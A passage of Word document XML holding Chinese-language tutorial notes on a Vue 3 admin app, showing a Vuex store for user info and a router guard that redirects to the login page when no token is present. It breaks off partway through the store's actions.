        <w:t xml:space="preserve">                    .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2745E01E" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        commit('SET_USERINFO', res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB39C44" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        resolve(res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7EAD7B" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D1F3D2" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    .catch(err =&gt; reject)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3283723E" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C27BC7" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B137787" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DD6829" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF1B8F3" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505103C4" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE0F6C4" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7182B48C" w14:textId="3CAE0BFC" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>permission</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，返回后台数据信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34679997" w14:textId="699F37BD" w:rsidR="001329A4" w:rsidRPr="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tore.dispatch</w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是异步动作，所以需要使用</w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>两个关键字对动作进行声明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FABFC73" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C889874" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import router from "~/router"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D9014" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { getToken } from "~/composables/auth"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9D2581" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { toast } from "~/composables/util"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B4C8B0" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import store from "~/store"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283E778" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4953D723" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局前置守卫</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30712CF6" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>router.beforeEach(</w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>async (to, from, next)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D6ABA5" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.log("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局前置守卫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468376FD" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C789B88" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const token = getToken()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F38A9E" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有登录，强制跳转到登录页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19C3EA" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if(!token &amp;&amp; to.path != "/login"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7DACDD" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        toast("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请先登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", "warning")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725D97B6" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return next({ path: "/login" })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9223DF" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0076D425" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B53068" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止重复登陆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670F02FC" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if(token &amp;&amp; to.path == "/login"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F276DB" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        toast("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿重复登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", "warning")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C68C53" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return next({ path: from.path? from.path: "/" })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901FAAF" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFADDB3" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0217E982" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRPr="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果用户登录了，自动获取用户信息，并存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vuex</w:t>
      </w:r>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65CCA8" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRPr="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    if(token){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E693E38" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRPr="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        await store.dispatch("getinfo")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0684DE7D" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008E45BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3258035B" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75857865" w14:textId="77777777" w:rsidR="008E45BB" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C0E46" w14:textId="1C68BFB1" w:rsidR="001329A4" w:rsidRDefault="008E45BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033C53CC" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C676DB6" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E8A639" w14:textId="497255C9" w:rsidR="001329A4" w:rsidRPr="00830302" w:rsidRDefault="00830302" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830302">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>现在，不论如何刷新页面，都会有数据显示在页面上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063DD804" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDA5C19" w14:textId="0DAB09E4" w:rsidR="00B57CE7" w:rsidRDefault="00B57CE7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样方式分装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ogin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94B5DF" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D11EA21" w14:textId="18745C87" w:rsidR="001329A4" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>tore/index.js:login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数封装进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395FFB89" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { createStore } from 'vuex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324193AF" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { login, getinfo } from '~/api/manager'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CB5D0B" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { setToken } from '~/composables/auth'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBD38E0" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123BC6F7" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> store </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CA030" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const store = createStore({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA1C98" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    state() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0117ADD1" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0473E00E" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C67243E" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            user: {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE65BD6" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5DFE53" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F2B156" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mutations: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0089FB66" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E32A6" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        SET_USERINFO(state, user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C69E5CB" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            state.user = user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A179BB" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC7E4BB" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659EC60E" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    actions: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1720E50D" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FFCEA8" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
